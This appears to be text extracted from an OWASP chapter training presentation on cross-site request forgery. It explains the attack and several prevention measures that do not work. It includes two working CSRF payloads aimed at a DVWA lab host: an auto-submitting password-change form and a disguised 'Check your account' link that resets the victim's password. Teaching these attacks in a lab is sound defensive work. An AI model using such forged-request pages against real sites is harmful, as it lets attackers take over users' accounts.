Understanding CSRF

CROSS SITE REQUEST FORGERYUNDERSTANDING

John Patrick Lita - OWASP Manila Chapter PresidentVenue: Philippine Army, Cyber Security Division, Taguig City OWASP Taguig Chapter

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

MEET THE PRESENTER

OWASP Manila Chapter PresidentProject Manager at Enterprise Linux ProfessionalsOwner of Active Security Training and Consultancy

Project leader for OWASP Online Academy

john.patrick.lita@owasp.org

2

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CROSS SITE REQUEST FORGERY

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

3

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CSRF ILLUSTRATION

4

C

Regular Form CSRF Form Template

COMMENT HERE: COMMENT HERE:

POST POST

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CSRF ILLUSTRATION

5

C

Regular Form CSRF Form Template

COMMENT HERE: COMMENT HERE:

POST POST

I AM AWESOME!

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CSRF ILLUSTRATION

6

C

Regular Form CSRF Form Template

COMMENT HERE: COMMENT HERE:

POST POST

I AM AWESOME!

Jaypee: I AM AWESOME!

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CSRF ILLUSTRATION

7

C

Regular Form CSRF Form Template

COMMENT HERE: COMMENT HERE:

POST POST

I AM NOOB!

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CSRF ILLUSTRATION

8

C

Regular Form CSRF Form Template

COMMENT HERE: COMMENT HERE:

POST POST

I AM NOOB!

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CSRF ILLUSTRATION

9

C

Regular Form CSRF Form Template

COMMENT HERE: COMMENT HERE:

POST POST

I AM NOOB!

Jaypee: I AM NOOB!

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

CANNOT READ THE ANTI-CSRF

10

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

NO SERVER SIDE VALIDATION

11

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

REVIEWING THE FORM

12

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

THE CHECKING THE SOURCE CODE

13

CSRF DEMODEEP UNDERSTANDING WITH CSRF VULNERABILITY

PREVENTION MEASURES THAT DO NOT WORK

CSRF TEMPLATE WEB INTERFACE

Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any browser you like. then click the submit and analyse the behaviour.After that try yo login. please proceed to next page for source code. Page 16

15

PREVENTION MEASURES THAT DO NOT WORK

CSRF TEMPLATE SOURCE CODE

<!DOCTYPE html>

<html> <head> <title>CSRF Template</title> </head><body><br>

<form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br> <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br> Confirm New Password: <br> <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br> <input type="submit" value="Change" name="Change"> </form></body></html>

16

PREVENTION MEASURES THAT DO NOT WORK

PREVENTION MEASURES THAT DO NOT WORK

▸ Using a secret cookie

▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

17

PREVENTION MEASURES THAT DO NOT WORK

PREVENTION MEASURES THAT DO NOT WORK

▸ Only Accept POST requests

▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.

POSTREQUEST

18

PREVENTION MEASURES THAT DO NOT WORK

PREVENTION MEASURES THAT DO NOT WORK

▸ Multi-Step Transaction Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.

▸ URL Rewriting This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user’s session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another.

▸ HTTPSHTTPS does nothing to defend against CSRF.

19

CSRF DEMODEEP UNDERSTANDING WITH CSRF VULNERABILITY

PREVENTION MEASURES THAT DO NOT WORK

CSRF ATTACK USING SOCIAL ENGINEERING

One of the technique or attack vector is to perform a click jacking attack, to test this attack please proceed on the next page for the source code, then try to executing it by clicking the “Click Here!”

21

PREVENTION MEASURES THAT DO NOT WORK

CSRF ATTACK USING SOCIAL ENGINEERING

<!DOCTYPE html>

<html><title>Please Check your Account Here!</title> <head>Check your account Here!</head> <body>

<a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a></body></html>

JOHN.PATRICK.LITA@OWASP.ORG

THANK YOU FOR LISTENING